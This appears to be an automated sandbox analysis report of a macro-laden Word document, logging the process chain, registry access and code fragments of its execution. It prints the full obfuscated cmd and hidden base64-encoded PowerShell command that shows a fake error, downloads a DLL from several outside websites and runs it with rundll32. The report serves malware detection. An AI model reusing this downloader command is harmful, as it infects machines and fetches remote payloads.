Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc UwBFAFQAIAAgACgAIgA1ACIAKwAiAEYAVABzAEcAIgApACAAKAAgAFsAdABZAFAARQBdACgAIgB7ADEAfQB7ADMAfQB7ADAAfQB7ADQAfQB7ADIAfQAiACAALQBGACAAJwBJAG8ALgAnACwAJwBzAHkAJwAsACcATwByAHkAJwAsACcAcwB0AGUAbQAuACcALAAnAGQASQByAGUAYwB0ACcAKQApACAAOwAgACAAJABxAEUAMwBSADkAPQAgACAAWwBUAHkAUABlAF0AKAAiAHsAMQB9AHsAMAB9AHsANQB9AHsANAB9AHsAMgB9AHsAMwB9ACIALQBmACcAWQAnACwAJwBTACcALAAnAFAAbwBpAE4AdABtAEEAbgAnACwAJwBBAEcARQByACcALAAnAHQARQBtAC4AbgBFAFQALgBTAGUAUgBWAEkAYwBlACcALAAnAHMAJwApACAAIAA7ACQASwBvADMAYQBjADYAMwA9ACQAVAA4ADIASAAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQAUAA2AF8AUwA7ACQASQA3ADAAWgA9ACgAJwBZADUAJwArACcAMABFACcAKQA7ACAAIAAoAEcAZQB0AC0AaQBUAEUAbQAgACAAKAAiAHYAIgArACIAYQAiACsAIgBSAEkAQQBCAGwAZQA6ADUAIgArACIARgB0AFMAZwAiACkAIAAgACkALgBWAGEAbABVAGUAOgA6ACIAQwByAGAARQBBAHQARQBgAGQAaQByAGUAYABjAHQAbwByAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAMgBXACcAKwAnAEsAJwArACcAYQBrACcAKQArACgAJwB0AGsAcwB3ACcAKwAnAGUAJwArACcAMgBXACcAKQArACgAJwBBAG4ANgBvAHQAJwArACcAaAAnACkAKwAoACcAaABlACcAKwAnADIAVwAnACkAKQAgACAALQBjAFIARQBQAEwAQQBDAGUAIAAoACcAZQAnACsAJwAyAFcAJwApACwAWwBDAEgAQQBSAF0AOQAyACkAKQA7ACQAVwA5ADAAWAA9ACgAJwBEACcAKwAoACcANgAzACcAKwAnAFQAJwApACkAOwAgACgAVgBhAHIASQBBAEIAbABlACAAUQBlADMAUgA5ACAALQB2AEEATAB1AEUATwBuAGwAIAAgACkAOgA6ACIAUwBgAEUAQwBgAFUAcgBJAHQAYABZAGAAcAByAG8AdABvAEMATwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABFADMAMgBOAD0AKAAnAEoAJwArACgAJwA5ADYAJwArACcAQwAnACkAKQA7ACQAVQBlADcAdgA2AGUAbQAgAD0AIAAoACgAJwBOACcAKwAnADQAOQAnACkAKwAnAEkAJwApADsAJABCADMAMQBDAD0AKAAnAEEAOAAnACsAJwAxAEoAJwApADsAJABRAGYAeAAxADAAeABhAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0ASwBhACcAKwAnAGsAdABrAHMAdwB7ACcAKwAnADAAJwArACcAfQAnACsAJwBBAG4AJwArACcANgBvAHQAaABoAHsAMAB9ACcAKQAtAEYAIABbAGMAaABhAFIAXQA5ADIAKQArACQAVQBlADcAdgA2AGUAbQArACcALgBkACcAIAArACAAJwBsAGwAJwA7ACQAWQAwADMARQA9ACgAJwBCADMAJwArACcAMwBSACcAKQA7ACQASwAxAGkAdQB4AHgAcAA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAFQAYQAxAHkAcwBwADQAPQAoACcAbgBzACcAKwAnACAAJwArACgAJwB3AHUAIABkACcAKwAnAGIAIAAnACkAKwAoACcAbgAnACsAJwBkADoAJwApACsAKAAnAC8AJwArACcALwBzAGgAYQBuACcAKQArACcAbgAnACsAKAAnAGEAcgAnACsAJwBlACcAKQArACcAZAAnACsAKAAnAC4AYwBvAG0ALwBjAG8AJwArACcAbgAnACsAJwB0AGUAJwArACcAbgAnACkAKwAnAHQAJwArACgAJwAvAGwAaAAnACsAJwBBACcAKQArACgAJwBMAGUAJwArACcAUwAnACkAKwAoACcALwAhAG4AJwArACcAcwAnACkAKwAoACcAIAB3AHUAIAAnACsAJwBkAGIAJwApACsAKAAnACAAbgAnACsAJwBkADoAJwApACsAJwAvAC8AJwArACgAJwBqAGUAZQAnACsAJwB2AGEAbgAnACkAKwAoACcAbABpAGMALgBjAG8AbQAvAHcAJwArACcAcAAtACcAKwAnAGMAbwAnACsAJwBuACcAKwAnAHQAZQAnACkAKwAoACcAbgB0ACcAKwAnAC8AJwApACsAKAAnAHIAJwArACcAOABNAC8AIQAnACsAJwBuAHMAJwApACsAKAAnACAAJwArACcAdwB1ACAAJwArACcAZABiACAAbgBkACcAKQArACgAJwA6AC8AJwArACcALwBkACcAKQArACcAYQBzACcAKwAoACcAaAAnACsAJwB1AGQAJwApACsAKAAnAGEAbgBjAGUAJwArACcALgBjAG8AJwApACsAKAAnAG0ALwAnACsAJwB0AGgAJwApACsAJwBpAG4AJwArACgAJwBrAHAAJwArACcAaAAnACsAJwBwAC8AZAAnACkAKwAnAGcAJwArACcAcwAnACsAKAAnADcASgAnACsAJwBtADkAJwApACsAJwAvACcAKwAoACcAIQBuACcAKwAnAHMAIAB3AC	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Kaktksw\An6othh\N49I.dll AnyString	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Kaktksw\An6othh\N49I.dll AnyString	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Kaktksw\An6othh\N49I.dll',#1	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Kizmwn\teeko.fjq',WoLqYWepjKvdu	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Kizmwn\teeko.fjq',#1	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ggqmed\gtlaa.wuq',yTCLpaeQtdZh	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ggqmed\gtlaa.wuq',#1	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yapklbuza\ogcvtegh.uyf',ENdgueltfLPhAUL	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Yapklbuza\ogcvtegh.uyf',#1	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Mwxqfujfxki\wrmqlfoubv.sew',vtkOSGpvF	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Mwxqfujfxki\wrmqlfoubv.sew',#1	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2090409457.0000000002DC7000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbCom source: powershell.exe, 00000005.00000002.2090409457.0000000002DC7000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\dll\System.Management.Automation.pdbProg source: powershell.exe, 00000005.00000002.2090409457.0000000002DC7000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2090409457.0000000002DC7000.00000004.00000040.sdmp
Source:	Binary string: ws\System.Management.Automation.pdbpdbion.pdbERSP source: powershell.exe, 00000005.00000002.2090409457.0000000002DC7000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2090409457.0000000002DC7000.00000004.00000040.sdmp
Source:	Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2090288416.0000000002930000.00000002.00000001.sdmp

Data Obfuscation:

Document contains an embedded VBA with many GOTO operations indicating source code obfuscation

Show sources

Source: ARCH_25_012021.doc	Stream path 'Macros/VBA/Gusca95luq_' : High number of GOTO operations
Source: VBA code instrumentation	OLE, VBA macro, High number of GOTO operations: Module Gusca95luq_			Name: Gusca95luq_

Obfuscated command line found

Show sources

Source: unknown

Process created: C:\Windows\System32\cmd.exe cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc UwBFAFQAIAAgACgAIgA1ACIAKwAiAEYAVABzAEcAIgApACAAKAAgAFsAdABZAFAARQBdACgAIgB7ADEAfQB7ADMAfQB7ADAAfQB7ADQAfQB7ADIAfQAiACAALQBGACAAJwBJAG8ALgAnACwAJwBzAHkAJwAsACcATwByAHkAJwAsACcAcwB0AGUAbQAuACcALAAnAGQASQByAGUAYwB0ACcAKQApACAAOwAgACAAJABxAEUAMwBSADkAPQAgACAAWwBUAHkAUABlAF0AKAAiAHsAMQB9AHsAMAB9AHsANQB9AHsANAB9AHsAMgB9AHsAMwB9ACIALQBmACcAWQAnACwAJwBTACcALAAnAFAAbwBpAE4AdABtAEEAbgAnACwAJwBBAEcARQByACcALAAnAHQARQBtAC4AbgBFAFQALgBTAGUAUgBWAEkAYwBlACcALAAnAHMAJwApACAAIAA7ACQASwBvADMAYQBjADYAMwA9ACQAVAA4ADIASAAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQAUAA2AF8AUwA7ACQASQA3ADAAWgA9ACgAJwBZADUAJwArACcAMABFACcAKQA7ACAAIAAoAEcAZQB0AC0AaQBUAEUAbQAgACAAKAAiAHYAIgArACIAYQAiACsAIgBSAEkAQQBCAGwAZQA6ADUAIgArACIARgB0AFMAZwAiACkAIAAgACkALgBWAGEAbABVAGUAOgA6ACIAQwByAGAARQBBAHQARQBgAGQAaQByAGUAYABjAHQAbwByAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAMgBXACcAKwAnAEsAJwArACcAYQBrACcAKQArACgAJwB0AGsAcwB3ACcAKwAnAGUAJwArACcAMgBXACcAKQArACgAJwBBAG4ANgBvAHQAJwArACcAaAAnACkAKwAoACcAaABlACcAKwAnADIAVwAnACkAKQAgACAALQBjAFIARQBQAEwAQQBDAGUAIAAoACcAZQAnACsAJwAyAFcAJwApACwAWwBDAEgAQQBSAF0AOQAyACkAKQA7ACQAVwA5ADAAWAA9ACgAJwBEACcAKwAoACcANgAzACcAKwAnAFQAJwApACkAOwAgACgAVgBhAHIASQBBAEIAbABlACAAUQBlADMAUgA5ACAALQB2AEEATAB1AEUATwBuAGwAIAAgACkAOgA6ACIAUwBgAEUAQwBgAFUAcgBJAHQAYABZAGAAcAByAG8AdABvAEMATwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABFADMAMgBOAD0AKAAnAEoAJwArACgAJwA5ADYAJwArACcAQwAnACkAKQA7ACQAVQBlADcAdgA2AGUAbQAgAD0AIAAoACgAJwBOACcAKwAnADQAOQAnACkAKwAnAEkAJwApADsAJABCADMAMQBDAD0AKAAnAEEAOAAnACsAJwAxAEoAJwApADsAJABRAGYAeAAxADAAeABhAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0ASwBhACcAKwAnAGsAdABrAHMAdwB7ACcAKwAnADAAJwArACcAfQAnACsAJwBBAG4AJwArACcANgBvAHQAaABoAHsAMAB9ACcAKQAtAEYAIABbAGMAaABhAFIAXQA5ADIAKQArACQAVQBlADcAdgA2AGUAbQArACcALgBkACcAIAArACAAJwBsAGwAJwA7ACQAWQAwADMARQA9ACgAJwBCADMAJwArACcAMwBSACcAKQA7ACQASwAxAGkAdQB4AHgAcAA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAFQAYQAxAHkAcwBwADQAPQAoACcAbgBzACcAKwAnACAAJwArACgAJwB3AHUAIABkACcAKwAnAGIAIAAnACkAKwAoACcAbgAnACsAJwBkADoAJwApACsAKAAnAC8AJwArACcALwBzAGgAYQBuACcAKQArACcAbgAnACsAKAAnAGEAcgAnACsAJwBlACcAKQArACcAZAAnACsAKAAnAC4AYwBvAG0ALwBjAG8AJwArACcAbgAnACsAJwB0AGUAJwArACcAbgAnACkAKwAnAHQAJwArACgAJwAvAGwAaAAnACsAJwBBACcAKQArACgAJwBMAGUAJwArACcAUwAnACkAKwAoACcALwAhAG4AJwArACcAcwAnACkAKwAoACcAIAB3AHUAIAAnACsAJwBkAGIAJwApACsAKAAnACAAbgAnACsAJwBkADoAJwApACsAJwAvAC8AJwArACgAJwBqAGUAZQAnACsAJwB2AGEAbgAnACkAKwAoACcAbABpAGMALgBjAG8AbQAvAHcAJwArACcAcAAtACcAKwAnAGMAbwAnACsAJwBuACcAKwAnAHQAZQAnACkAKwAoACcAbgB0ACcAKwAnAC8AJwApACsAKAAnAHIAJwArACcAOABNAC8AIQAnACsAJwBuAHMAJwApACsAKAAnACAAJwArACcAdwB1ACAAJwArACcAZABiACAAbgBkACcAKQArACgAJwA6AC8AJwArACcALwBkACcAKQArACcAYQBzACcAKwAoACcAaAAnACsAJwB1AGQAJwApACsAKAAnAGEAbgBjAGUAJwArACcALgBjAG8AJwApACsAKAAnAG0ALwAnACsAJwB0AGgAJwApACsAJwBpAG4AJwArACgAJwBrAHAAJwArACcAaAAnACsAJwBwAC8AZAAnACkAKwAnAGcAJwArACcAcwAnACsA

Suspicious powershell command line found

Show sources

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc UwBFAFQAIAAgACgAIgA1ACIAKwAiAEYAVABzAEcAIgApACAAKAAgAFsAdABZAFAARQBdACgAIgB7ADEAfQB7ADMAfQB7ADAAfQB7ADQAfQB7ADIAfQAiACAALQBGACAAJwBJAG8ALgAnACwAJwBzAHkAJwAsACcATwByAHkAJwAsACcAcwB0AGUAbQAuACcALAAnAGQASQByAGUAYwB0ACcAKQApACAAOwAgACAAJABxAEUAMwBSADkAPQAgACAAWwBUAHkAUABlAF0AKAAiAHsAMQB9AHsAMAB9AHsANQB9AHsANAB9AHsAMgB9AHsAMwB9ACIALQBmACcAWQAnACwAJwBTACcALAAnAFAAbwBpAE4AdABtAEEAbgAnACwAJwBBAEcARQByACcALAAnAHQARQBtAC4AbgBFAFQALgBTAGUAUgBWAEkAYwBlACcALAAnAHMAJwApACAAIAA7ACQASwBvADMAYQBjADYAMwA9ACQAVAA4ADIASAAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQAUAA2AF8AUwA7ACQASQA3ADAAWgA9ACgAJwBZADUAJwArACcAMABFACcAKQA7ACAAIAAoAEcAZQB0AC0AaQBUAEUAbQAgACAAKAAiAHYAIgArACIAYQAiACsAIgBSAEkAQQBCAGwAZQA6ADUAIgArACIARgB0AFMAZwAiACkAIAAgACkALgBWAGEAbABVAGUAOgA6ACIAQwByAGAARQBBAHQARQBgAGQAaQByAGUAYABjAHQAbwByAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAMgBXACcAKwAnAEsAJwArACcAYQBrACcAKQArACgAJwB0AGsAcwB3ACcAKwAnAGUAJwArACcAMgBXACcAKQArACgAJwBBAG4ANgBvAHQAJwArACcAaAAnACkAKwAoACcAaABlACcAKwAnADIAVwAnACkAKQAgACAALQBjAFIARQBQAEwAQQBDAGUAIAAoACcAZQAnACsAJwAyAFcAJwApACwAWwBDAEgAQQBSAF0AOQAyACkAKQA7ACQAVwA5ADAAWAA9ACgAJwBEACcAKwAoACcANgAzACcAKwAnAFQAJwApACkAOwAgACgAVgBhAHIASQBBAEIAbABlACAAUQBlADMAUgA5ACAALQB2AEEATAB1AEUATwBuAGwAIAAgACkAOgA6ACIAUwBgAEUAQwBgAFUAcgBJAHQAYABZAGAAcAByAG8AdABvAEMATwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABFADMAMgBOAD0AKAAnAEoAJwArACgAJwA5ADYAJwArACcAQwAnACkAKQA7ACQAVQBlADcAdgA2AGUAbQAgAD0AIAAoACgAJwBOACcAKwAnADQAOQAnACkAKwAnAEkAJwApADsAJABCADMAMQBDAD0AKAAnAEEAOAAnACsAJwAxAEoAJwApADsAJABRAGYAeAAxADAAeABhAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0ASwBhACcAKwAnAGsAdABrAHMAdwB7ACcAKwAnADAAJwArACcAfQAnACsAJwBBAG4AJwArACcANgBvAHQAaABoAHsAMAB9ACcAKQAtAEYAIABbAGMAaABhAFIAXQA5ADIAKQArACQAVQBlADcAdgA2AGUAbQArACcALgBkACcAIAArACAAJwBsAGwAJwA7ACQAWQAwADMARQA9ACgAJwBCADMAJwArACcAMwBSACcAKQA7ACQASwAxAGkAdQB4AHgAcAA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAFQAYQAxAHkAcwBwADQAPQAoACcAbgBzACcAKwAnACAAJwArACgAJwB3AHUAIABkACcAKwAnAGIAIAAnACkAKwAoACcAbgAnACsAJwBkADoAJwApACsAKAAnAC8AJwArACcALwBzAGgAYQBuACcAKQArACcAbgAnACsAKAAnAGEAcgAnACsAJwBlACcAKQArACcAZAAnACsAKAAnAC4AYwBvAG0ALwBjAG8AJwArACcAbgAnACsAJwB0AGUAJwArACcAbgAnACkAKwAnAHQAJwArACgAJwAvAGwAaAAnACsAJwBBACcAKQArACgAJwBMAGUAJwArACcAUwAnACkAKwAoACcALwAhAG4AJwArACcAcwAnACkAKwAoACcAIAB3AHUAIAAnACsAJwBkAGIAJwApACsAKAAnACAAbgAnACsAJwBkADoAJwApACsAJwAvAC8AJwArACgAJwBqAGUAZQAnACsAJwB2AGEAbgAnACkAKwAoACcAbABpAGMALgBjAG8AbQAvAHcAJwArACcAcAAtACcAKwAnAGMAbwAnACsAJwBuACcAKwAnAHQAZQAnACkAKwAoACcAbgB0ACcAKwAnAC8AJwApACsAKAAnAHIAJwArACcAOABNAC8AIQAnACsAJwBuAHMAJwApACsAKAAnACAAJwArACcAdwB1ACAAJwArACcAZABiACAAbgBkACcAKQArACgAJwA6AC8AJwArACcALwBkACcAKQArACcAYQBzACcAKwAoACcAaAAnACsAJwB1AGQAJwApACsAKAAnAGEAbgBjAGUAJwArACcALgBjAG8AJwApACsAKAAnAG0ALwAnACsAJwB0AGgAJwApACsAJwBpAG4AJwArACgAJwBrAHAAJwArACcAaAAnACsAJwBwAC8AZAAnACkAKwAnAGcAJwArACcAcwAnACsAKAAnADcASgAnACsAJwBtADkAJwApACsAJwAvACcAKwAoACcAIQBuACcAKwAnAHMAIAB3AC
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc UwBFAFQAIAAgACgAIgA1ACIAKwAiAEYAVABzAEcAIgApACAAKAAgAFsAdABZAFAARQBdACgAIgB7ADEAfQB7ADMAfQB7ADAAfQB7ADQAfQB7ADIAfQAiACAALQBGACAAJwBJAG8ALgAnACwAJwBzAHkAJwAsACcATwByAHkAJwAsACcAcwB0AGUAbQAuACcALAAnAGQASQByAGUAYwB0ACcAKQApACAAOwAgACAAJABxAEUAMwBSADkAPQAgACAAWwBUAHkAUABlAF0AKAAiAHsAMQB9AHsAMAB9AHsANQB9AHsANAB9AHsAMgB9AHsAMwB9ACIALQBmACcAWQAnACwAJwBTACcALAAnAFAAbwBpAE4AdABtAEEAbgAnACwAJwBBAEcARQByACcALAAnAHQARQBtAC4AbgBFAFQALgBTAGUAUgBWAEkAYwBlACcALAAnAHMAJwApACAAIAA7ACQASwBvADMAYQBjADYAMwA9ACQAVAA4ADIASAAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQAUAA2AF8AUwA7ACQASQA3ADAAWgA9ACgAJwBZADUAJwArACcAMABFACcAKQA7ACAAIAAoAEcAZQB0AC0AaQBUAEUAbQAgACAAKAAiAHYAIgArACIAYQAiACsAIgBSAEkAQQBCAGwAZQA6ADUAIgArACIARgB0AFMAZwAiACkAIAAgACkALgBWAGEAbABVAGUAOgA6ACIAQwByAGAARQBBAHQARQBgAGQAaQByAGUAYABjAHQAbwByAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAMgBXACcAKwAnAEsAJwArACcAYQBrACcAKQArACgAJwB0AGsAcwB3ACcAKwAnAGUAJwArACcAMgBXACcAKQArACgAJwBBAG4ANgBvAHQAJwArACcAaAAnACkAKwAoACcAaABlACcAKwAnADIAVwAnACkAKQAgACAALQBjAFIARQBQAEwAQQBDAGUAIAAoACcAZQAnACsAJwAyAFcAJwApACwAWwBDAEgAQQBSAF0AOQAyACkAKQA7ACQAVwA5ADAAWAA9ACgAJwBEACcAKwAoACcANgAzACcAKwAnAFQAJwApACkAOwAgACgAVgBhAHIASQBBAEIAbABlACAAUQBlADMAUgA5ACAALQB2AEEATAB1AEUATwBuAGwAIAAgACkAOgA6ACIAUwBgAEUAQwBgAFUAcgBJAHQAYABZAGAAcAByAG8AdABvAEMATwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABFADMAMgBOAD0AKAAnAEoAJwArACgAJwA5ADYAJwArACcAQwAnACkAKQA7ACQAVQBlADcAdgA2AGUAbQAgAD0AIAAoACgAJwBOACcAKwAnADQAOQAnACkAKwAnAEkAJwApADsAJABCADMAMQBDAD0AKAAnAEEAOAAnACsAJwAxAEoAJwApADsAJABRAGYAeAAxADAAeABhAD0AJABIAE8ATQBFACsAKAAoACcAewAwAH0ASwBhACcAKwAnAGsAdABrAHMAdwB7ACcAKwAnADAAJwArACcAfQAnACsAJwBBAG4AJwArACcANgBvAHQAaABoAHsAMAB9ACcAKQAtAEYAIABbAGMAaABhAFIAXQA5ADIAKQArACQAVQBlADcAdgA2AGUAbQArACcALgBkACcAIAArACAAJwBsAGwAJwA7ACQAWQAwADMARQA9ACgAJwBCADMAJwArACcAMwBSACcAKQA7ACQASwAxAGkAdQB4AHgAcAA9ACcAaAAnACAAKwAgACcAdAB0ACcAIAArACAAJwBwACcAOwAkAFQAYQAxAHkAcwBwADQAPQAoACcAbgBzACcAKwAnACAAJwArACgAJwB3AHUAIABkACcAKwAnAGIAIAAnACkAKwAoACcAbgAnACsAJwBkADoAJwApACsAKAAnAC8AJwArACcALwBzAGgAYQBuACcAKQArACcAbgAnACsAKAAnAGEAcgAnACsAJwBlACcAKQArACcAZAAnACsAKAAnAC4AYwBvAG0ALwBjAG8AJwArACcAbgAnACsAJwB0AGUAJwArACcAbgAnACkAKwAnAHQAJwArACgAJwAvAGwAaAAnACsAJwBBACcAKQArACgAJwBMAGUAJwArACcAUwAnACkAKwAoACcALwAhAG4AJwArACcAcwAnACkAKwAoACcAIAB3AHUAIAAnACsAJwBkAGIAJwApACsAKAAnACAAbgAnACsAJwBkADoAJwApACsAJwAvAC8AJwArACgAJwBqAGUAZQAnACsAJwB2AGEAbgAnACkAKwAoACcAbABpAGMALgBjAG8AbQAvAHcAJwArACcAcAAtACcAKwAnAGMAbwAnACsAJwBuACcAKwAnAHQAZQAnACkAKwAoACcAbgB0ACcAKwAnAC8AJwApACsAKAAnAHIAJwArACcAOABNAC8AIQAnACsAJwBuAHMAJwApACsAKAAnACAAJwArACcAdwB1ACAAJwArACcAZABiACAAbgBkACcAKQArACgAJwA6AC8AJwArACcALwBkACcAKQArACcAYQBzACcAKwAoACcAaAAnACsAJwB1AGQAJwApACsAKAAnAGEAbgBjAGUAJwArACcALgBjAG8AJwApACsAKAAnAG0ALwAnACsAJwB0AGgAJwApACsAJwBpAG4AJwArACgAJwBrAHAAJwArACcAaAAnACsAJwBwAC8AZAAnACkAKwAnAGcAJwArACcAcwAnACsAKAAnADcASgAnACsAJwBtADkAJwApACsAJwAvACcAKwAoACcAIQBuACcAKwAnAHMAIAB3AC			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_000007FF00270ED3 push E0000000h; ret	5_2_000007FF00270FF1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_000007FF0027100A push E0000000h; ret	5_2_000007FF00270FF1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00242D98 push 00242E25h; ret	7_2_00242E1D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00250020 push 00250058h; ret	7_2_00250050
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00244038 push 00244064h; ret	7_2_0024405C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0021A0B2 push 0021A0E0h; ret	7_2_0021A0D8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0021A0B4 push 0021A0E0h; ret	7_2_0021A0D8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0021B274 push 0021B2CDh; ret	7_2_0021B2C5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0022C34C push 0022C378h; ret	7_2_0022C370
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0021E450 push ecx; mov dword ptr [esp], edx	7_2_0021E454
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00250498 push 002504EFh; ret	7_2_002504E7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002504F4 push 0025055Ch; ret	7_2_00250554
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002505B8 push 002505E4h; ret	7_2_002505DC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00250580 push 002505ACh; ret	7_2_002505A4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0024B588 push 0024B5CAh; ret	7_2_0024B5C2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002505F0 push 0025063Ch; ret	7_2_00250634
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00250654 push 00250680h; ret	7_2_00250678
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0025068C push 002506B8h; ret	7_2_002506B0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0021E696 push ecx; mov dword ptr [esp], edx	7_2_0021E69C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0021E6F0 push ecx; mov dword ptr [esp], edx	7_2_0021E6F4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002506C4 push 002506F0h; ret	7_2_002506E8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0021D6DC push 0021D751h; ret	7_2_0021D749
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00218748 push 00218774h; ret	7_2_0021876C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0021E750 push ecx; mov dword ptr [esp], edx	7_2_0021E754
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0021D754 push 0021D7ADh; ret	7_2_0021D7A5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002537A8 push 002537E0h; ret	7_2_002537D8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00218798 push 002187C4h; ret	7_2_002187BC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_002507E4 push 00250827h; ret	7_2_0025081F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00250834 push 00250860h; ret	7_2_00250858
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0025086C push 00250898h; ret	7_2_00250890
